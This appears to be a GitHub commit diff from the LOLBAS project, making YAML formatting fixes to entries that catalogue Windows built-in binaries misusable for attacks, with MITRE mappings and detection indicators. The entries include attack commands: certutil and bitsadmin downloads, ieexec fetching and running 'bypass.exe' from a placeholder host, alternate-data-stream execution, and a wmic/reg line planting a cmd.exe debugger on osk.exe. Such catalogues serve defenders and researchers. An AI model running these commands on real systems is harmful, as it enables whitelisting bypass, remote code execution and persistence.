mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 20:22:24 +02:00
Minor adjustments to be yaml compliant
This commit is contained in:
Oddvar Moe
@@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
- Command: bash.exe -c calc.exe
|
||||
- Command: bash.exe -c calc.exe
|
||||
Description: Executes calc.exe from bash.exe
|
||||
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||
Category: AWL Bypass
|
||||
@@ -24,9 +24,9 @@ Full Path:
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
- IOC: Child process from bash.exe
|
||||
Resources:
|
||||
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||
Acknowledgement:
|
||||
|
||||
@@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
|
||||
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
Usecase: Download file from Internet
|
||||
Category: Download
|
||||
@@ -20,7 +20,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
|
||||
Description: Command for copying cmd.exe to another folder
|
||||
Usecase: Copy file
|
||||
Category: Copy
|
||||
@@ -28,7 +28,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
|
||||
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
|
||||
Usecase: Execute binary file specified. Can be used as a defensive evasion.
|
||||
Category: Execute
|
||||
@@ -40,11 +40,11 @@ Full Path:
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
- IOC: bitsadmin creates new files
|
||||
- IOC: bitsadmin adds data to alternate data stream
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
- IOC: bitsadmin creates new files
|
||||
- IOC: bitsadmin adds data to alternate data stream
|
||||
Resources:
|
||||
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
|
||||
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
|
||||
|
||||
@@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
|
||||
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
|
||||
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
||||
Category: Alternate data streams
|
||||
@@ -20,7 +20,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil -encode inputFileName encodedOutputFileName
|
||||
- Command: certutil -encode inputFileName encodedOutputFileName
|
||||
Description: Command to encode a file using Base64
|
||||
Usecase: Encode files to evade defensive measures
|
||||
Category: Encode
|
||||
@@ -28,7 +28,7 @@ Commands:
|
||||
MitreID: T1027
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
||||
- Command: certutil -decode encodedInputFileName decodedOutputFileName
|
||||
Description: Command to decode a Base64 encoded file.
|
||||
Usecase: Decode files to evade defensive measures
|
||||
Category: Decode
|
||||
@@ -40,11 +40,11 @@ Full Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||
- IOC: Useragent CertUtil URL Agent
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
- IOC: Useragent Microsoft-CryptoAPI/10.0
|
||||
- IOC: Useragent CertUtil URL Agent
|
||||
Resources:
|
||||
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
- Link: https://twitter.com/mattifestation/status/620107926288515072
|
||||
|
||||
@@ -4,7 +4,7 @@ Description: The IEExec.exe application is an undocumented Microsoft .NET Framew
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Download
|
||||
@@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command:ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Execute
|
||||
@@ -24,9 +24,9 @@ Full Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
Acknowledgement:
|
||||
|
||||
@@ -40,9 +40,9 @@ Full Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
Resources:
|
||||
- Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||
@@ -50,5 +50,5 @@ Acknowledgement:
|
||||
- Person: netbiosX
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: @PhilipTsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
@@ -31,14 +31,14 @@ Commands:
|
||||
Full Path:
|
||||
- Path: C:\Windows\System32\pcalua.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://twitter.com/KyleHanslovan/status/912659279806640128
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
- Person: Fab
|
||||
Handle: @0rbz_
|
||||
Handle: '@0rbz_'
|
||||
---
|
||||
@@ -1,4 +1,4 @@
|
||||
---
|
||||
---
|
||||
Name: Wab.exe
|
||||
Description: Windows address book manager
|
||||
Author: 'Oddvar Moe'
|
||||
@@ -16,9 +16,9 @@ Full Path:
|
||||
- Path: C:\Program Files\Windows Mail\wab.exe
|
||||
- Path: C:\Program Files (x86)\Windows Mail\wab.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: WAB.exe should normally never be used
|
||||
- IOC: WAB.exe should normally never be used
|
||||
Resources:
|
||||
- Link: https://twitter.com/Hexacorn/status/991447379864932352
|
||||
- Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
|
||||
|
||||
@@ -5,7 +5,7 @@ Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS).
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||
Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
@@ -20,7 +20,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
|
||||
- Command: 'wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"'
|
||||
Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well.
|
||||
Usecase: Execute binary by manipulate the debugger for a program to evade defensive counter measures
|
||||
Category: Execute
|
||||
@@ -72,9 +72,9 @@ Full Path:
|
||||
- Path: C:\Windows\System32\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wmic.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wmic getting scripts from remote system
|
||||
- IOC: Wmic getting scripts from remote system
|
||||
Resources:
|
||||
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||
|
||||
Reference in New Issue
Block a user